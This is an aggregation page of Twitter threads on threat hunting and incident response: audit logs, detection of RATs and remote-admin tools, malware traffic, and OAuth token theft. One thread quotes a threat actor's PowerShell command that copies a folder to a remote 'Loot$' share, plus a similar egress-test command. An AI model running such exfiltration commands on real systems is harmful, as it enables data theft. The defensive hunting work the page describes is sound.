Discover and read the best of Twitter Threads about #threathunting

Most recents (24)

OK, so there is definitely a problem with the Search-UnifiedAuditLog cmdlet in #Microsoft365. Confirmed this in multiple tenants - here's what I'm seeing: 🧵

#threathunting #threathunt #auditlogs #M365 #Office365 #O365 #M365Security
First, go to -> Audit and perform a new search for all events in a given timeframe (a few hours, total). Have this available for reference.
Next, open PowerShell and connect to Exchange Online:


You ran a search in the Defender portal with a date range of a few hours. Within that same timeframe, pick an even smaller date/time range that has < 100 events. You'll need those timestamps next.
Read 13 tweets
1/ I am taking a little break but couldn’t resist checking-out my favourite open-source projects for any updates. Doing so, I thought it will be useful to share my top 10 projects that anyone in the #infosec field should know about. Here they are 🧵:
2/ 📊 HELK ( The Hunting ELK (HELK) project provides an analytics and threat hunting platform for security teams to identify and respond to threats in their environment. Just load your logs and start hunting! #HELK #ThreatHunting Image
3/ 🔍 Sigma( ): Sigma enables infosec peeps to create rules for SIEM systems for detecting and responding to security incidents. It also allows us to share our rules in a non-vendor-specific format! Free detections anyone!?! #Sigma #SIEM
Read 13 tweets
Today's quick #malware analysis with #SecurityOnion: FAKEBAT, REDLINE STEALER, and GOZI/ISFB/URSNIF pcap from 2023-02-03!

Thanks to @malware_traffic for sharing this pcap!

More screenshots:…

@malware_traffic Let's review some of the data that #SecurityOnion generates from this traffic!

When you import the pcap using so-import-pcap, it will generate a hyperlink that will take you to the Overview dashboard:
@malware_traffic Here are the NIDS alerts:
Read 13 tweets
How are you showing value from your #ThreatHunting programs? I think a lot of teams really struggle with this, so interested in hearing others’ thoughts. Putting my $0.02 in the thread. 1/3
I think a lot of hunt teams look at findings as the holy grail, but I would argue that there are better ways to show value. One of the best I’ve found is to compare those hunt findings against true positive findings from other tools (other investments). 2/3
For example, how many hunt findings did you produce compared to the total findings worked by the SOC? If you really want to stand out, give your leaders data they’ve never seen before. If your metrics are only relevant to you, you probably aren’t playing your best hand. 3/3
Read 3 tweets
With the release of my open-source #CobaltStrike stager decoder (which you can read about here:…) I thought I'd make a thread showcasing some of the other great open-source tooling out there to help with Cobalt Strike #ThreatHunting and #ThreatIntel 🧵…: These are the OG scripts designed for interfacing with Team Servers. Famous for its get_beacon script for milking staged payloads from Team Servers and decrypting them, this GH account also has a script for logging into teamservers and wordlists💀… The first Cobalt Strike Beacon configuration extractor that I was aware of, @jpcert_en created a volatility plugin for finding and parsing Beacon configs from memory
Read 8 tweets
1/ #Azure In a recent case, the TA was able to compromise the user despite MFA (MFA fatigue).

After logging in, the attacker registered another mobile number as "Alternate Mobile Phone Call".

In the audit logs, we see this event within "Authentication Methods":

2/ The audit logs are a goldmine for finding suspicious behavior in an Azure tenant.

If we filter by "Core Directory", "UserManagement" and "Update user" ..
3/ .. we also see the ModifiedProperties (the modifications done by the attacker).

Notice, the primary Phone Number is a Swiss mobile phone (+41), and the attacker added a number from the United Arab Emirates (+971).

Suspicious? You bet!
Read 4 tweets
In the last months, I have collected some awesome new #KQL sources, and this 🧵lists them.
Are you using Defender For Endpoint, Sentinel, Intune or do you want to learn KQL then have a look!
#MDE #Sentinel #Intune #Detection #ThreatHunting
Type: Query
By: @msftsecurity
Community-based repository for a lot of available data sources in Sentinel. For the E5 detections take a look in the Microsoft 365 Defender Folder.
Type: Query
By: @reprise_99
Repository with 100s of KQL queries you can directly use. They are categorized into different Microsoft product categories. You are guaranteed to find useful queries here.
Read 14 tweets
At #IWCON2022, we have 15+ amazing #cybersecurity speakers from around the world 🌍

To share unique methods and findings with y’all 😍🙌

Get ready with your questions. Our experts will answer you live 🔥

Book your ticket:

Meet our speakers 🧵👇 Image
#1 Gabrielle Hempel @gabsmashh, #security engineer @Netwitness 🥳

Her topic: #Threat hunting in #cloud environments 🌩️

Time: 17th Dec, 7:30 pm IST

Want to attend this talk? 😍

Book your ticket here:

#cloudhunting #threathunting Image
#2 Luke Stephens @hakluke, founder of @haksecio 🔥

His topic: How I used #recon techniques to identify a prolific #scammer 👊

Time: 17th Dec, 6:30 pm IST ❤️

Don't wanna miss it?

Register today:

#infosec #hacking #hackingthehacker Image
Read 18 tweets
🦖Day 36 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: MacOS[.]System[.]QuarantineEvents

Link:… Image
This artifact parses the 'com[.]apple.LaunchServices.QuarantineEventsV2' sqlite database to provide defenders with information around files that have been downloaded from the internet.

Information includes:

- DL Time
- Origin
- Agent Name/Bundle
- User
- Event UUID
On macOS, when a user downloads a file from the internet/third party source, the file will have an extended attribute associated with it called 'com[.]apple.quarantine'.

This asserts that the file will not be opened/executed, until explicitly allowed by the user (via prompt). Image
Read 9 tweets
Hey there, today we have something special for you.

Here's a list of SPY/INTELLIGENCE agencies across the world. 🕵️‍♀️🕵🌍🔎

#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT

1. RAW (Research & Analysis Wing), India
Formed: 21 September 1968
2. CIA (Central Intelligence Agency), USA
Formed: September 18, 1947
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
3. Mossad, Israel
Formed: 13 December 1949 (as the Central Institute for Coordination)
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
Read 12 tweets
1/ In a recent compromise, we saw the same multi-layered infection chain that eventually led to AsyncRAT, as described by the ASEC team. [1]

AsyncRAT could not connect to the C2 because the destination port on the firewall was blocked. 🧵

2/ As can be seen in the screenshot above, port 6666 was used, which can be chosen arbitrarily within the builder from AsyncRAT.

3/ Of course, connections within the firewall logs that connect to an IP address on a high port are interesting for #ThreatHunting.

And, even more, connections to a blocked high port.
Read 5 tweets
Hey #OSINT, you might have heard about @spiderfoot, let's try to learn what it does the best. #ThreatHunting #threatintelligence #recon #infosec

A thread👇
SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more.
#ThreatHunting #threatintelligence #recon #infosec #OSINT
You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.
#ThreatHunting #threatintelligence #recon #infosec #OSINT
Read 6 tweets
1/ #ThreatHunting: @Avast has blogged how Roshtyak checks the VBAWarnings registry value.

If the value is 1 ("Enable all macros"), then the code will not be executed because it is assumed that this setting is only enabled in a sandbox (or by courageous users). 🧵 #CyberSecurity
2/ "Interestingly, this means that users, who for whatever reason have lowered their security this way, are immune to Roshtyak." [1]
3/ However, this "Enable all macros" value can also be explicitly set for Outlook

(Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook - Level = 1).

If this value is set to 1 in a user context, a nifty persistence within Outlook may have been set up by a TA.
Read 7 tweets
1/ #ThreatHunting: Normal users (not developers) who have Python in their Music (!) directory? This screams TA 😅

In an investigation on a breached network, we discovered the following directory:

2/ The funny thing is that the TA appended "Music" to the ordinary directory name "python-3.9.10.amd64" to make it look more legitimate?

In several directories, we found attack scripts (written in Python), including

3/ And the whole impacket suite.


Monitoring or creating a baseline (which users are using Python) could be helpful here, or just monitoring from which paths Python is started (like in our example from the Music directory).
Read 5 tweets
1/ #ThreatHunting:

In a compromised network, the TA used PCHunter on different systems to disable the local AV (or at least tried it).

In the web requests recorded on the firewall, we found traces of the download:

🧵 #CyberSecurity
2/ @CrowdStrike also mentioned PCHUnter in the latest ThreatHunting report, along with GMER.…
3/ I have tweeted about two of these tools (PCHunter / GMER) before, and we also see these two products regularly in our IR cases.

Read 4 tweets
1/ #ThreatHunting:

In a compromised network, we saw the following request in the proxy logs:


This scanner is trendy among ransomware groups and has been mentioned in reports by @TheDFIRReport, among others. [1] 🧵
2/ This HTTP request can now be used very well for an alert.

Or better, collect and monitor all your DNS logs, because a DNS request will still go out if the Advanced IP Scanner is run without an installation (portable version).

An excellent opportunity for detection.
3/ You can see the DNS request for the domain www.advanced-ip-scanner[.]com below.
Read 4 tweets
1/ #ThreatHunting

Another one for the people who monitor PowerShell logs or command lines:

Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse

This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).

#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:

Copy-Item -Path "C:\Temp\" -Destination "\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the
-Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):

# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
Read 4 tweets
A list of top 10 popular malware reports that every Malware Analyst should check out

Take a look at these excellent Malware analysis reports

#malware #ThreatHunting #threatintelligence #fireye #virus #Talos @TalosSecurity #linux #hacking #networks #rootkits

1⃣ CheckPoint - SpeakUp: A New Undetected Backdoor Linux Trojan

2⃣ First Sednit UEFI Rootkit unveiled

Read 11 tweets
1\ #ThreatHunting: Detecting OAuth Token Theft in Azure / M365

This technique is STILL being abused by Chinese APT groups. This blog covers several methods of detecting this technique😈.

It's also a good reminder to always perform browser forensics ;)…
2\ METHOD 1: Look for the OAuth redirect consent link in browser history and/or proxy logs.

Take note of the following fields:
- client_id (malicious app id)
- redirect_uri (malicious domain)
- scope (API permissions requested)
3\ Review permissions requested in the scope field (I'll show you where else to find these permissions in the logs).

Take note of these:
- User.Read
- User.ReadWrite
- User.ReadWrite.All
- Mail.ReadWrite
- Calendars.ReadWrite
- Files.ReadWrite
- User.Export.All
Read 6 tweets
1/ #ThreatHunting:

#QuasarRAT is another RAT we see from time to time in our IR cases and was also used against NATO facilities in March. [1]

We can hunt for

1⃣ The default port within the FW logs
4⃣Persistence mechanisms

2/ @qualys has published an excellent paper ("Stealthy Quasar Evolving to Lead the RAT Race") about Quasar, where the whole builder and much more are described in detail. [2]
3/ In the client builder (which creates an executable which is used for the infection), the default port is pre-configured to 4782. Image
Read 12 tweets
1/ #ThreatHunting

MeshCentral is another remote admin software installed by TAs we have seen in our IR cases [1].

Following is a brief introduction to the software and what forensic traces MeshCentral leaves on the network and the hosts. 🧵

2/ For our tests, we use the hosted instance of, but the management software can also be run on a separate server, controlled by the TA.

After logging into the panel, we can download an agent for different operating systems (Windows, Mac, Linux).
3/ Before the installation or execution of the agent, the server URL is displayed under "Connection Details".

In our example, the agent connects to, but another domain can be configured when the management server is self-hosted.
Read 19 tweets
1/ #ThreatHunting for #AsyncRAT

We have various ways to find infected hosts with AsyncRAT:

1⃣ Usage of standard C2 ports
2⃣Hunting for persistence
3⃣Mutexes FTW
4⃣Last but not least, hunting for dropped DLLs

Let's go 🤠🧵

2/ AsyncRAT is a popular Trojan executed at the end of an infection chain on target computers.

@hpsecurity ([2],[3]) and @Trellix ([4]) have both reported in recent reports that TAs have been deploying AsyncRAT.
3/ Since the source code of AsyncRAT is publicly available [1], we can obtain a copy to investigate and build detection capabilities for this RAT.
Read 25 tweets
🔔I published a new script to parse the log of #AppLocker🔒 , which I called Get-AppLockerEventlog.ps1

It compiles all the useful data needed in #threathunting and #DFIR

You can find the script and the documentation here:
2/ Also, You can save the output as a CSV.
3/ It comes with 04 cases (block, all, allow, audit)
Read 3 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!